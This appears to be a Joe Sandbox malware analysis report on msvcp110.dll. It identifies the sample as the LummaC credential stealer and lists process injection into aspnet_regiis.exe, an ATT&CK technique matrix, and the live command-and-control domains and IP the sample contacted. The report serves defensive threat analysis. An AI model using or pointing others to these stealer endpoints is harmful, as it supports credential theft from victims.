Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Directory queried: number of queries: 2307

Source: Yara match	File source: 00000007.00000003.2120852736.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2154600497.0000000002A74000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2154648334.0000000002A6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2154718277.0000000002A6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 6200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 2316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 6432, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 6200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 2316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 6432, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	121 Virtualization/Sandbox Evasion	2 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	311 Process Injection	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	121 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	21 File and Directory Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Rundll32	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
msvcp110.dll	63%	ReversingLabs	Win32.Trojan.Tedy
msvcp110.dll	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.all	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
withdrwblon.cyou	188.114.97.3	true	true		unknown

Contacted URLs

Name	Malicious	Reputation
strikebripm.sbs	true	unknown
ostracizez.sbs	true	unknown
offybirhtdi.sbs	true	unknown
mediavelk.sbs	true	unknown
definitib.sbs	true	unknown
elaboretib.sbs	true	unknown
https://withdrwblon.cyou/api	true	unknown
activedomest.sbs	true	unknown
withdrwblon.cyou	true	unknown
arenbootk.sbs	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	aspnet_regiis.exe, 00000005.00000003.2075017467.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074892888.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074798783.000000000511D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074629854.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074501421.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074425670.0000000004EBB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102385416.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102185643.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2101976232.0000000004F6E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://withdrwblon.cyou/apita	aspnet_regiis.exe, 00000007.00000002.2181626465.00000000028B1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/ac/?q=	aspnet_regiis.exe, 00000005.00000003.2075017467.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074892888.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074798783.000000000511D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074629854.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074501421.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074425670.0000000004EBB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102385416.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102185643.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2101976232.0000000004F6E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://withdrwblon.cyou/4	aspnet_regiis.exe, 00000005.00000003.2135373880.0000000002C6A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2122475735.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2117624045.0000000002C67000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2117817609.0000000002C6B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2122903505.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2118139887.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2117739223.0000000002C67000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/fp	aspnet_regiis.exe, 00000009.00000003.2101367134.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2101288100.0000000002A67000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/_J	aspnet_regiis.exe, 00000007.00000003.2073743744.0000000002897000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/apia	aspnet_regiis.exe, 00000009.00000003.2166902326.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000002.2193459254.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2192694382.0000000002A7D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/;	aspnet_regiis.exe, 00000009.00000003.2115491807.0000000002A8A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/apid	aspnet_regiis.exe, 00000007.00000003.2133362044.00000000028B1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/apii	aspnet_regiis.exe, 00000005.00000002.2179104070.0000000002C46000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2176086224.0000000002C46000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	aspnet_regiis.exe, 00000005.00000003.2075017467.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074892888.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074798783.000000000511D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074629854.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074501421.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074425670.0000000004EBB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102385416.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102185643.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2101976232.0000000004F6E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://withdrwblon.cyou/apio	aspnet_regiis.exe, 00000005.00000003.2176086224.0000000002BD3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000002.2178892830.0000000002BD3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/apis	aspnet_regiis.exe, 00000005.00000002.2179104070.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2176086224.0000000002C50000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/kink	aspnet_regiis.exe, 00000009.00000003.2154624449.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2151671497.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/	aspnet_regiis.exe, 00000009.00000003.2151671497.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://x1.c.lencr.org/0	aspnet_regiis.exe, 00000005.00000003.2102800866.00000000051ED000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2102321758.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2129461445.000000000503D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	aspnet_regiis.exe, 00000005.00000003.2102800866.00000000051ED000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2102321758.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2129461445.000000000503D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	aspnet_regiis.exe, 00000005.00000003.2075017467.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074892888.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074798783.000000000511D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074629854.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074501421.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074425670.0000000004EBB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102385416.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102185643.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2101976232.0000000004F6E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://withdrwblon.cyou:443/api	aspnet_regiis.exe, aspnet_regiis.exe, 00000005.00000003.2176086224.0000000002BD3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000002.2178892830.0000000002BD3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.2181626465.0000000002892000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2073743744.0000000002897000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.2181626465.0000000002839000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000002.2193527673.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.microsoft.c	aspnet_regiis.exe, 00000009.00000003.2192632256.0000000002A5A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2192132723.0000000002A10000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/products/firefoxgro.all	aspnet_regiis.exe, 00000009.00000003.2131037044.0000000005257000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://withdrwblon.cyou/CoEd	aspnet_regiis.exe, 00000005.00000003.2122475735.0000000002C58000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/n&	aspnet_regiis.exe, 00000009.00000003.2154624449.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2151671497.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/apies	aspnet_regiis.exe, 00000005.00000002.2179104070.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2176086224.0000000002C50000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	aspnet_regiis.exe, 00000005.00000003.2075017467.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074892888.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074798783.000000000511D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074629854.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074501421.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074425670.0000000004EBB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102385416.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102185643.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2101976232.0000000004F6E000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/t	aspnet_regiis.exe, 00000005.00000003.2163888758.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2192725506.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000002.2193298279.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2192132723.0000000002A10000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/g	aspnet_regiis.exe, 00000007.00000002.2181626465.0000000002857000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	aspnet_regiis.exe, 00000005.00000003.2075017467.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074892888.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074798783.000000000511D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074629854.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074501421.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074425670.0000000004EBB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102385416.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102185643.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2101976232.0000000004F6E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	aspnet_regiis.exe, 00000005.00000003.2102800866.00000000051ED000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2102321758.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2129461445.000000000503D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://withdrwblon.cyou/c	aspnet_regiis.exe, 00000009.00000003.2115491807.0000000002A8A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ocsp.rootca1.amazontrust.com0:	aspnet_regiis.exe, 00000005.00000003.2102800866.00000000051ED000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2102321758.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2129461445.000000000503D000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/apil%	aspnet_regiis.exe, 00000009.00000003.2128547831.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	aspnet_regiis.exe, 00000005.00000003.2075017467.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074892888.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074798783.000000000511D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074629854.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074501421.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074425670.0000000004EBB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102385416.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102185643.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2101976232.0000000004F6E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	aspnet_regiis.exe, 00000009.00000003.2131037044.0000000005257000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://withdrwblon.cyou/apihBp	aspnet_regiis.exe, 00000005.00000003.2135615827.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2164188299.0000000002C50000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/ys	aspnet_regiis.exe, 00000007.00000003.2101886794.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2101654427.00000000028CA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	aspnet_regiis.exe, 00000005.00000003.2075017467.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074892888.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074798783.000000000511D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074629854.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074501421.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074425670.0000000004EBB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102385416.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102185643.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2101976232.0000000004F6E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://withdrwblon.cyou/Y	aspnet_regiis.exe, 00000005.00000003.2163888758.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2164040531.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2192725506.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000002.2193298279.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2192132723.0000000002A10000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/api6C	aspnet_regiis.exe, 00000007.00000002.2181626465.00000000028B1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/apiX%	aspnet_regiis.exe, 00000009.00000003.2154624449.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2151671497.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/S	aspnet_regiis.exe, 00000007.00000003.2167941219.00000000028A2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/a	aspnet_regiis.exe, 00000007.00000002.2182950265.0000000004F15000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	aspnet_regiis.exe, 00000005.00000003.2102800866.00000000051ED000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2102321758.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2129461445.000000000503D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://withdrwblon.cyou/apiD	aspnet_regiis.exe, 00000007.00000002.2181626465.000000000281D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/at	aspnet_regiis.exe, 00000007.00000002.2182950265.0000000004F15000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/wJ	aspnet_regiis.exe, 00000007.00000002.2181626465.0000000002857000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/C	aspnet_regiis.exe, 00000009.00000002.2193527673.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2180512449.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	aspnet_regiis.exe, 00000005.00000003.2075017467.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074892888.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074798783.000000000511D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074629854.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074501421.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074425670.0000000004EBB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102385416.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102185643.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2101976232.0000000004F6E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://withdrwblon.cyou/J	aspnet_regiis.exe, 00000007.00000003.2088111868.00000000028BC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2088211554.00000000028BC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/apice	aspnet_regiis.exe, 00000007.00000003.2167941219.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.2181626465.00000000028B1000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	withdrwblon.cyou	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1541486
Start date and time:	2024-10-24 21:58:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	msvcp110.dll
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winDLL@16/0@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 61% Number of executed functions: 15 Number of non-executed functions: 39
Cookbook Comments:	Found application associated with file extension: .dll

Warnings

